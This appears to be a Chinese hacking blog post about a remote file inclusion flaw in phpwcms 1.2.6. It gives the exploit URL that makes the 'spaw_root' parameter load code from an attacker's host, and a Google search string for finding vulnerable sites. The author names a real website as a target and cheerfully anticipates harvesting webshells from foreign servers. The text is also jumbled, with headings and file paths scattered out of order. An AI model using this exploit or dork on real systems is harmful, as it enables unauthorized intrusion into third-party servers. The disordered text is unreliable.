1

include/inc_ext/spaw/dialogs/img_library.php

(作者:非零解责任编辑:原野)

二、学习的第一天

include/inc_ext/spaw/dialogs/img.php

一、看见漏洞公告

include/inc_ext/spaw/dialogs/colorpicker.php

欢迎在新浪微博上关注我们

include/inc_ext/spaw/dialogs/td.php

<>

本文导航

文件中的$spaw_root的没有过滤的情况下,包含'**class/lang.class.php'

include/inc_ext/spaw/dialogs/a.php

最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告大致的意思是这样的,phpwcms 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php

include/inc_ext/spaw/dialogs/confirm.php

看来这次的学习也蛮有意义的!发现一点,国外的网站的管理人员比较重视安全在出现漏洞的第二天,很多网站都把漏洞补了,还有的网站被入侵后能马上发现,并及时清除了webshell

马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的看来这次发了,这次国外的wenshell肯定是一大堆了呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://文件直接就可以浏览看来上次我得到的服务器基本上是2003的具体的代码公告中没给出来可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件